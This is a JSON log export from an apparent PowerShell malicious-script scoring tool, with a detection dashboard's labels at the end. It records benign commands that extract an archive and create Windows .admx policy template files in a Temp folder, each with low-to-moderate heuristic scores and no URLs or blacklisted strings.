{"eventrecid": "1181246", "time": {"SystemTime": "2024-10-18T10:28:14.3946135Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181248", "time": {"SystemTime": "2024-10-18T10:28:14.4123321Z"}, "totalscore": {"totalscore": 43.27623489709821, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 43.27623489709821, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"13\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"13\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.43276234897098215, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181249", "time": {"SystemTime": "2024-10-18T10:28:14.4132286Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/ActiveXInstallService.admx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/ActiveXInstallService.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181250", "time": {"SystemTime": "2024-10-18T10:28:14.4140868Z"}, "totalscore": {"totalscore": 79.75392552014868, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 79.75392552014868, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7975392552014868, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181251", "time": {"SystemTime": "2024-10-18T10:28:14.4149541Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181252", "time": {"SystemTime": "2024-10-18T10:28:14.4210866Z"}, "totalscore": {"totalscore": 59.24174248103225, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.24174248103225, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5924174248103224, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181254", "time": {"SystemTime": "2024-10-18T10:28:14.8011683Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181256", "time": {"SystemTime": "2024-10-18T10:28:14.8018101Z"}, "totalscore": {"totalscore": 42.73099294457856, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 42.73099294457856, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"14\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"14\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.4273099294457856, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181257", "time": {"SystemTime": "2024-10-18T10:28:14.8028899Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AddRemovePrograms.admx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AddRemovePrograms.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181258", "time": {"SystemTime": "2024-10-18T10:28:14.8036529Z"}, "totalscore": {"totalscore": 79.75392552014868, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 79.75392552014868, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7975392552014868, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181259", "time": {"SystemTime": "2024-10-18T10:28:14.8046033Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181260", "time": {"SystemTime": "2024-10-18T10:28:14.8065281Z"}, "totalscore": {"totalscore": 59.24174248103225, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.24174248103225, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5924174248103224, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181262", "time": {"SystemTime": "2024-10-18T10:28:14.9913439Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181264", "time": {"SystemTime": "2024-10-18T10:28:14.9918883Z"}, "totalscore": {"totalscore": 42.20937213776904, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 42.20937213776904, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"15\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"15\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.42209372137769036, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181265", "time": {"SystemTime": "2024-10-18T10:28:14.9925329Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AppCompat.admx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AppCompat.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181266", "time": {"SystemTime": "2024-10-18T10:28:14.9932206Z"}, "totalscore": {"totalscore": 79.75392552014868, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 79.75392552014868, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7975392552014868, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181267", "time": {"SystemTime": "2024-10-18T10:28:14.9940815Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181268", "time": {"SystemTime": "2024-10-18T10:28:15.0454064Z"}, "totalscore": {"totalscore": 59.24174248103225, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.24174248103225, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5924174248103224, "randomized_string": 0, "detect_strings_blacklist": []}]
Summary
Num of Logs
Malicious Script Detected
Malicious Score
Details
ID
Time
Score
Logistic
Regression
URLs
Suspicious
Strings
IEX
Too much
Symbols
Randomized String
Source Code
Load Original File Sourcecode
Source Code
×
ChatGPT
Break
Copy